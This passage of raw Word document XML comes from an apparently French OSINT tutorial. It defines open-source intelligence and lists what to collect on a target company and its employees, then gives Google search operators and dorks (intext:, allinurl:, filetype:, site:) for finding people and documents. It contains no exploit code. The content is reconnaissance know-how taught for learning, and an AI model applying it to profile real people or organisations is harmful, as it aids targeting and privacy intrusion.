    </w:p>
    <w:p w14:paraId="6B619A41" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A67A122" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC0000"/>
        </w:rPr>
        <w:t xml:space="preserve">Qu’est-ce que l’OSINT (Open Source Intelligence) ? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149D5006" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7213B245" w14:textId="1D754459" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>En français, c’est Renseignement de Source Ouverte, c’est une information accessible à tous et non classifiée</w:t>
      </w:r>
      <w:r w:rsidR="000E037B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E037B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>public)</w:t>
      </w:r>
      <w:r>
        <w:t>. C’est la recherche directement de l’information sur le net via</w:t>
      </w:r>
      <w:r w:rsidR="000E037B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AAF4D4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="517F5B48" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les moteurs de recherches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDDB326" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les réseaux sociaux </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2E720C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les outils OSINT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59DA2DDE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Les méthodes d’ingénierie sociale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221E92FD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les sites spécialisés dans la collecte d’informations publiques sur les organisations </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F9B89F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4C2C74E4" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="608D3375" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="23FBE72C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>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23B72" w14:paraId="6C487470" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9029" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="CC0000"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D9EAD3"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="11E04A65" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Titre3"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="33" w:name="_eolflsyxkr43" w:colFirst="0" w:colLast="0"/>
            <w:bookmarkEnd w:id="33"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Les moteurs de recherche</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6492BC23" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32A7D1D8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="2E9F6AEA" wp14:editId="34D55C10">
            <wp:extent cx="5314950" cy="3409950"/>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5314950" cy="3409950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2A0756" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="46684D1A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A62B6CA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280B1CC8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Les informations collectées :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5BDD60" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584898F8" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sur l’entreprise cible </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74214DEA" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sur les employés </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB6F275" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sur les sites Web </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5180546F" w14:textId="5E72773F" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sur </w:t>
      </w:r>
      <w:r w:rsidR="004073B4">
        <w:t>les technologies utilisées</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> par la cible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43340FAC" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F4A2229" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A0D4F38" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Recherche de l’information avec le moteur de recherche &lt;&lt;google&gt;&gt; : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA4E666" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="50277C5E" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En utilisant la recherche simple </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DB0D86" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En utilisant des opérateurs de recherches avancés </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA28C53" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En utilisant Google </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dork</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EDF9EE" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En utilisant Google Hacking </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Database</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (GHDB) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699A1EFD" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En utilisant des recherche avancés </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="7839AF78" wp14:editId="580D90BE">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3209925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>257175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2571750" cy="561975"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="20" name="Zone de texte 20"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1515450" y="779200"/>
                          <a:ext cx="2556300" cy="542100"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="C9DAF8"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="299F61CB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>Ex: &lt;&lt;intext: nom et prénom&gt;&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6277765F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Recherche le contenu dans les pages </w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7839AF78" id="Zone de texte 20" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:252.75pt;margin-top:20.25pt;width:202.5pt;height:44.25pt;z-index:2516664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" fillcolor="#c9daf8" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="299F61CB" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>Ex: &lt;&lt;intext: nom et prénom&gt;&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6277765F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Recherche le contenu dans les pages </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A3AF98" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A943256" w14:textId="1F89427F" w:rsidR="00223B72" w:rsidRDefault="00F05E70">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Recherche sur des personnes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425BD819" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="587DFC2A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="1B76B67F" wp14:editId="3443E813">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3209925</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>257175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2571750" cy="561975"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="12" name="Zone de texte 12"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="1515450" y="779200"/>
                          <a:ext cx="2556300" cy="542100"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="C9DAF8"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="06276679" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>Ex: &lt;&lt;allinurl: nom et prenom&gt;&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3092E77B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>Recherche de contenu dans les URL</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="1B76B67F" id="Zone de texte 12" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;margin-left:252.75pt;margin-top:20.25pt;width:202.5pt;height:44.25pt;z-index:25166745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" fillcolor="#c9daf8" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="06276679" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>Ex: &lt;&lt;allinurl: nom et prenom&gt;&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3092E77B" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>Recherche de contenu dans les URL</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="743FC33A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="4D317E75" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="7ECD280A" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="1F860A29" w14:textId="6BE118EE" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="74408A8D" w14:textId="358659D3" w:rsidR="00223B72" w:rsidRDefault="00BA62A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="2C2AF4C0" wp14:editId="6770CD5C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3209192</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>70045</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3006090" cy="624254"/>
                <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1" name="Zone de texte 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3006090" cy="624254"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="C9DAF8"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="08BD6820" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>Ex: &lt;&lt;filetype:xlsx nom d’un type de fichier&gt;&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="65504FB7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Recherche les fichiers xlsx du nom du fichier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F4C0" id="Zone de texte 1" o:spid="_x0000_s1035" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:252.7pt;margin-top:5.5pt;width:236.7pt;height:49.15pt;z-index:2516684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" fillcolor="#c9daf8" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="08BD6820" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>Ex: &lt;&lt;filetype:xlsx nom d’un type de fichier&gt;&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="65504FB7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Recherche les fichiers xlsx du nom du fichier </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Recherche sur des documents </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B10443F" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="6A171CFF" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
    <w:p w14:paraId="13C04313" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="12729ACE" wp14:editId="2CCDB613">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3209192</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>139943</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3006300" cy="712177"/>
                <wp:effectExtent l="0" t="0" r="3810" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="13" name="Zone de texte 13"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3006300" cy="712177"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="C9DAF8"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3E6223B7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>Ex: &lt;&lt;site:nom du site&gt;&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5600F66D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                            <w:pPr>
                              <w:spacing w:line="240" w:lineRule="auto"/>
                              <w:textDirection w:val="btLr"/>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Recherche les pages web du site spécifiqu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9ACE" id="Zone de texte 13" o:spid="_x0000_s1036" type="#_x0000_t202" style="position:absolute;margin-left:252.7pt;margin-top:11pt;width:236.7pt;height:56.1pt;z-index:2516695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" fillcolor="#c9daf8" stroked="f">
                <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                  <w:txbxContent>
                    <w:p w14:paraId="3E6223B7" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>Ex: &lt;&lt;site:nom du site&gt;&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5600F66D" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:spacing w:line="240" w:lineRule="auto"/>
                        <w:textDirection w:val="btLr"/>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t xml:space="preserve">Recherche les pages web du site spécifique </w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D9DA9C" w14:textId="77777777" w:rsidR="00223B72" w:rsidRDefault="00223B72"/>
